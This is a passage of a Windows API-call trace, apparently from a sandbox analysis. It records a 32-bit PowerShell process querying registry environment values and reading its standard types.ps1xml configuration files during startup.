	[0222.924] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x5090b0, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShe") returned 0x76
	[0222.924] GetLastError () returned 0x3
	[0222.925] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x5090b0, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0222.925] GetLastError () returned 0x3
	[0222.925] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ec00 | out: phkResult=0x10ec00*=0x35c) returned 0x0
	[0222.925] RegQueryValueExW (in: hKey=0x35c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10ec44, lpData=0x0, lpcbData=0x10ec40*=0x0 | out: lpType=0x10ec44*=0x2, lpData=0x0, lpcbData=0x10ec40*=0x6c) returned 0x0
	[0222.925] RegQueryValueExW (in: hKey=0x35c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10ec44, lpData=0x5090b0, lpcbData=0x10ec40*=0x6c | out: lpType=0x10ec44*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x10ec40*=0x6c) returned 0x0
	[0222.926] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x5090b0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0222.926] GetLastError () returned 0x3
	[0222.926] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x5090b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0222.926] GetLastError () returned 0x3
	[0222.926] RegCloseKey (hKey=0x35c) returned 0x0
	[0222.926] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x5090b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0222.926] GetLastError () returned 0x3
	[0222.926] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ec00 | out: phkResult=0x10ec00*=0x35c) returned 0x0
	[0222.927] RegQueryValueExW (in: hKey=0x35c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10ec44, lpData=0x0, lpcbData=0x10ec40*=0x0 | out: lpType=0x10ec44*=0x0, lpData=0x0, lpcbData=0x10ec40*=0x0) returned 0x2
	[0222.927] RegCloseKey (hKey=0x35c) returned 0x0
	[0222.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.937] GetLastError () returned 0xcb
	[0222.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.939] GetLastError () returned 0xcb
	[0222.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.946] GetLastError () returned 0xcb
	[0222.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.946] GetLastError () returned 0xcb
	[0222.954] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10eb80 | out: phkResult=0x10eb80*=0x35c) returned 0x0
	[0222.955] RegQueryValueExW (in: hKey=0x35c, lpValueName="path", lpReserved=0x0, lpType=0x10ebe8, lpData=0x0, lpcbData=0x10ebe4*=0x0 | out: lpType=0x10ebe8*=0x1, lpData=0x0, lpcbData=0x10ebe4*=0x74) returned 0x0
	[0223.052] RegQueryValueExW (in: hKey=0x35c, lpValueName="path", lpReserved=0x0, lpType=0x10ebc8, lpData=0x0, lpcbData=0x10ebc4*=0x0 | out: lpType=0x10ebc8*=0x1, lpData=0x0, lpcbData=0x10ebc4*=0x74) returned 0x0
	[0223.052] RegQueryValueExW (in: hKey=0x35c, lpValueName="path", lpReserved=0x0, lpType=0x10ebc8, lpData=0x5090b0, lpcbData=0x10ebc4*=0x74 | out: lpType=0x10ebc8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x10ebc4*=0x74) returned 0x0
	[0223.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x10e748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0223.052] GetLastError () returned 0xcb
	[0223.052] SetErrorMode (uMode=0x1) returned 0x1
	[0223.052] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x10ebc8 | out: lpFileInformation=0x10ebc8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0223.053] GetLastError () returned 0xcb
	[0223.053] SetErrorMode (uMode=0x1) returned 0x1
	[0223.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e73c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0223.059] GetLastError () returned 0xcb
	[0223.059] SetErrorMode (uMode=0x1) returned 0x1
	[0223.059] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ebbc | out: lpFileInformation=0x10ebbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0223.059] GetLastError () returned 0xcb
	[0223.059] SetErrorMode (uMode=0x1) returned 0x1
	[0223.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e73c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0223.064] GetLastError () returned 0xcb
	[0223.064] SetErrorMode (uMode=0x1) returned 0x1
	[0223.064] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ebbc | out: lpFileInformation=0x10ebbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0223.064] GetLastError () returned 0xcb
	[0223.064] SetErrorMode (uMode=0x1) returned 0x1
	[0223.072] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.073] GetLastError () returned 0xcb
	[0223.075] GetACP () returned 0x4e4
	[0223.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e5cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0223.090] GetLastError () returned 0xcb
	[0223.090] SetErrorMode (uMode=0x1) returned 0x1
	[0223.091] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x364
	[0223.091] GetLastError () returned 0x0
	[0223.092] GetFileType (hFile=0x364) returned 0x1
	[0223.092] SetErrorMode (uMode=0x1) returned 0x1
	[0223.092] GetFileType (hFile=0x364) returned 0x1
	[0223.093] ReadFile (in: hFile=0x364, lpBuffer=0x2a5d2dc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2a5d2dc*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.093] GetLastError () returned 0x0
	[0223.094] ReadFile (in: hFile=0x364, lpBuffer=0x2a5d2dc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2a5d2dc*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.094] GetLastError () returned 0x0
	[0223.095] ReadFile (in: hFile=0x364, lpBuffer=0x2a5d2dc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2a5d2dc*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.095] GetLastError () returned 0x0
	[0223.095] ReadFile (in: hFile=0x364, lpBuffer=0x2a5d2dc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2a5d2dc*, lpNumberOfBytesRead=0x10eb34*=0xcf3, lpOverlapped=0x0) returned 1
	[0223.095] GetLastError () returned 0x0
	[0223.096] ReadFile (in: hFile=0x364, lpBuffer=0x2a5c76f, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2a5c76f*, lpNumberOfBytesRead=0x10eb34*=0x0, lpOverlapped=0x0) returned 1
	[0223.096] GetLastError () returned 0x0
	[0223.096] ReadFile (in: hFile=0x364, lpBuffer=0x2a5d2dc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2a5d2dc*, lpNumberOfBytesRead=0x10eb34*=0x0, lpOverlapped=0x0) returned 1
	[0223.096] GetLastError () returned 0x0
	[0223.190] CloseHandle (hObject=0x364) returned 1
	[0223.191] GetLastError () returned 0x0
	[0223.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0223.192] GetLastError () returned 0x0
	[0223.192] SetErrorMode (uMode=0x1) returned 0x1
	[0223.193] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2a6e650 | out: lpFileInformation=0x2a6e650*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0223.193] GetLastError () returned 0x0
	[0223.193] SetErrorMode (uMode=0x1) returned 0x1
	[0223.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0223.193] GetLastError () returned 0x0
	[0223.194] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10eab8 | out: phkResult=0x10eab8*=0x364) returned 0x0
	[0223.194] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10eb00, lpData=0x0, lpcbData=0x10eafc*=0x0 | out: lpType=0x10eb00*=0x1, lpData=0x0, lpcbData=0x10eafc*=0x56) returned 0x0
	[0223.194] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10eb00, lpData=0x5090b0, lpcbData=0x10eafc*=0x56 | out: lpType=0x10eb00*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10eafc*=0x56) returned 0x0
	[0223.195] RegCloseKey (hKey=0x364) returned 0x0
	[0223.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0223.195] GetLastError () returned 0x0
	[0223.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0223.195] GetLastError () returned 0x0
	[0223.347] GetSystemInfo (in: lpSystemInfo=0x10e238 | out: lpSystemInfo=0x10e238*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0223.348] VirtualQuery (in: lpAddress=0x10d9f4, lpBuffer=0x10e9f4, dwLength=0x1c | out: lpBuffer=0x10e9f4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0223.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10e5cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0223.374] GetLastError () returned 0x0
	[0223.374] SetErrorMode (uMode=0x1) returned 0x1
	[0223.374] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x364
	[0223.375] GetLastError () returned 0x0
	[0223.375] GetFileType (hFile=0x364) returned 0x1
	[0223.375] SetErrorMode (uMode=0x1) returned 0x1
	[0223.375] GetFileType (hFile=0x364) returned 0x1
	[0223.375] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.375] GetLastError () returned 0x0
	[0223.376] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.376] GetLastError () returned 0x0
	[0223.376] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.376] GetLastError () returned 0x0
	[0223.455] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.456] GetLastError () returned 0x0
	[0223.456] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.456] GetLastError () returned 0x0
	[0223.457] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.457] GetLastError () returned 0x0
	[0223.457] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.457] GetLastError () returned 0x0
	[0223.457] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.457] GetLastError () returned 0x0
	[0223.457] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.458] GetLastError () returned 0x0
	[0223.459] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.459] GetLastError () returned 0x0
	[0223.459] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.459] GetLastError () returned 0x0
	[0223.459] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.459] GetLastError () returned 0x0
	[0223.460] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.460] GetLastError () returned 0x0
	[0223.460] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.460] GetLastError () returned 0x0
	[0223.460] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.460] GetLastError () returned 0x0
	[0223.460] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.461] GetLastError () returned 0x0
	[0223.461] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.461] GetLastError () returned 0x0
	[0223.463] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.463] GetLastError () returned 0x0
	[0223.464] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.464] GetLastError () returned 0x0
	[0223.464] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.464] GetLastError () returned 0x0
	[0223.464] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.464] GetLastError () returned 0x0
	[0223.464] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.464] GetLastError () returned 0x0
	[0223.464] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.465] GetLastError () returned 0x0
	[0223.465] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.465] GetLastError () returned 0x0
	[0223.465] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.465] GetLastError () returned 0x0
	[0223.465] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.465] GetLastError () returned 0x0
	[0223.465] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.465] GetLastError () returned 0x0
	[0223.466] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.466] GetLastError () returned 0x0
	[0223.466] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.466] GetLastError () returned 0x0
	[0223.466] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.466] GetLastError () returned 0x0
	[0223.466] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.467] GetLastError () returned 0x0
	[0223.467] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.467] GetLastError () returned 0x0
	[0223.467] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.467] GetLastError () returned 0x0
	[0223.472] ReadFile (in: hFile=0x364, lpBuffer=0x2aa2a6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10eb34, lpOverlapped=0x0 | out: lpBuffer=0x2aa2a6c*, lpNumberOfBytesRead=0x10eb34*=0x1000, lpOverlapped=0x0) returned 1
	[0223.472] GetLastError () returned 0x0
